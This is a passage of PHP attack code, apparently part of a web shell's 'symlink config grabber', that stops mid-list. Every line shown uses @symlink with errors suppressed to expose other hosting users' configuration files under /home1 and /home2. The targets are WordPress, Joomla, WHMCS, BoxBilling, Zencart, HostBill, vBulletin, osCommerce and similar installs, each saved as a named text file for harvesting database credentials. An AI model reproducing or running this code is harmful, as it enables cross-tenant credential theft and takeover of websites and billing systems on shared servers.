1960. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
1961. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
1962. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
1963. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
1964. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
1965. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
1966. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
1967. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
1968. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
1969. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
1970. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
1971. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
1972. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
1973. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
1974. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
1975. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
1976. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
1977. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
1978. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
1979. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
1980. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
1981. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
1982. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
1983. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
1984. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
1985. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
1986. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
1987. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
1988. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
1989. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
1990. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1991. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
1992. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
1993. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
1994. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
1995. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
1996. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
1997. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
1998. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
1999. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2000. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2001. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2002. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2003. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2004. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2005. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2006. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2007. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2008. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2009. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2010. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2011. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2012. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2013. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2014. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2015. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2016. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2017. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2018. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2019. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2020. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2021. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2022. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2023. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2024. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2025. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2026. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2027. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2028. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2029. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2030. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2031. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2032. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2033. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2034. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2035. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2036. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2037. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2038. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2039. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2040. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2041. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2042. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2043. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2044. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2045. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2046. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2047. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2048. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2049. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2050. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2051. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2052. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2053. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2054. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2055. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2056. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2057. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2058. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2059. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2060. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2061. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2062. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2063. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2064. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2065. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2066. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2067. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2068. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2069. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2070. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2071. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2072. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2073. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2074. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2075. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2076. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2077. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2078. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2079. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2080. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2081. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2082. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2083. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2084. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2085. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2086. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2087. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2088. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2089. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2090. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2091. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2092. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2093. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2094. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2095. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2096. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2097. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2098. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2099. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2100. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2101. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2102. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2103. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2104. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2105. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2106. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2107. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2108. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2109. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2110. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2111. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2112. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2113. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2114. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2115. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2116. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2117. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2118. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2119. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2120. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2121.  
2122. //Home2
2123.  
2124. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
2125. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
2126. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
2127. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
2128. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
2129. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
2130. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
2131. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
2132. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
2133. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
2134. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
2135. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
2136. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
2137. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
2138. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
2139. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
2140. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2141. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2142. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2143. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2144. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2145. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2146. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2147. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2148. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2149. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2150. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2151. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2152. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2153. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2154. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2155. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2156. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2157. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2158. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2159. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2160. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2161. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2162. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2163. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2164. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2165. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2166. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2167. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2168. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2169. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2170. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2171. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2172. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2173. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2174. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2175. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2176. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2177. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2178. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2179. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2180. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2181. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2182. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2183. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2184. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2185. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2186. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2187. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2188. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2189. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2190. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2191. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2192. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2193. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2194. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2195. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2196. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2197. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2198. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2199. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2200. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2201. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2202. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2203. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2204. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2205. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2206. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2207. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2208. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2209. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2210. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2211. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2212. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2213. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2214. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2215. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2216. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2217. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2218. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2219. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2220. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2221. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2222. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2223. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2224. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2225. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2226. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2227. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2228. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2229. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2230. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2231. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2232. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2233. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2234. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2235. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2236. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2237. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2238. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2239. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2240. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2241. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2242. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2243. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2244. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2245. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2246. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2247. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2248. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2249. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2250. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2251. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2252. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2253. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2254. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2255. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2256. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2257. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2258. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2259. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2260. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2261. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2262. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2263. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2264. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2265. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2266. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2267. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2268. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2269. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2270. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2271. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2272. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
